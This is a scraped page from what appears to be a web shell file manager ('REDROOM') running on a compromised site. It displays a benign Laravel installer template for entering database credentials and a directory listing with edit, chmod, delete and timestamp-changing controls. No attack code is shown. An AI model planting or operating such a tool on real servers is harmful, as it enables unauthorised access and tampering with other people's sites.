REDROOM
PHP 8.2.30
Path:
Logout
Edit File
Size: 1.93 KB
Close
//proc/thread-self/root/home/byroehnu/easetack.com/resources/views/installation/step3.blade.php
Text
Base64
@extends('installation.installation') @section('content') <div class="mar-ver pad-btm text-center"> <h1 class="h3">Database setup</h1> <p>Fill this form with valid database credentials</p> </div> @if(session()->has('error')) <div class="row" style="margin-top: 20px;"> <div class="col-md-12"> <div class="alert alert-danger"> <strong>Invalid Database Credentials!! </strong>Please check your database credentials carefully </div> </div> </div> @endif <p class="text-muted font-13"> <form method="POST" action="{{ route('install.db') }}"> @csrf <div class="form-group"> <label for="db_host">Database Host</label> <input type="text" class="form-control" id="db_host" name="DB_HOST" required autocomplete="off"> <input type="hidden" name="types[]" value="DB_HOST"> </div> <div class="form-group"> <label for="db_name">Database Name</label> <input type="text" class="form-control" id="db_name" name="DB_DATABASE" required autocomplete="off"> <input type="hidden" name="types[]" value="DB_DATABASE"> </div> <div class="form-group"> <label for="db_user">Database Username</label> <input type="text" class="form-control" id="db_user" name="DB_USERNAME" required autocomplete="off"> <input type="hidden" name="types[]" value="DB_USERNAME"> </div> <div class="form-group"> <label for="db_pass">Database Password</label> <input type="password" class="form-control" id="db_pass" name="DB_PASSWORD" autocomplete="off"> <input type="hidden" name="types[]" value="DB_PASSWORD"> </div> <div class="text-center"> <button type="submit" class="btn btn-primary">Continue</button> </div> </form> </p> @endsection
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 8
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
installation.blade.php
1.08 KB
lrw-rw-rw-
2025-04-26 10:34:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step0.blade.php
1.25 KB
lrw-rw-rw-
2025-04-26 10:34:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step1.blade.php
2.04 KB
lrw-rw-rw-
2025-05-01 07:34:10
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step2.blade.php
1.46 KB
lrw-rw-rw-
2025-05-01 08:25:08
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step3.blade.php
1.93 KB
lrw-rw-rw-
2025-04-08 04:12:57
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step4.blade.php
627 B
lrw-rw-rw-
2025-04-08 04:12:57
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step5.blade.php
1.33 KB
lrw-rw-rw-
2025-04-26 10:34:42
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
step6.blade.php
563 B
lrw-rw-rw-
2025-04-08 04:12:57
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).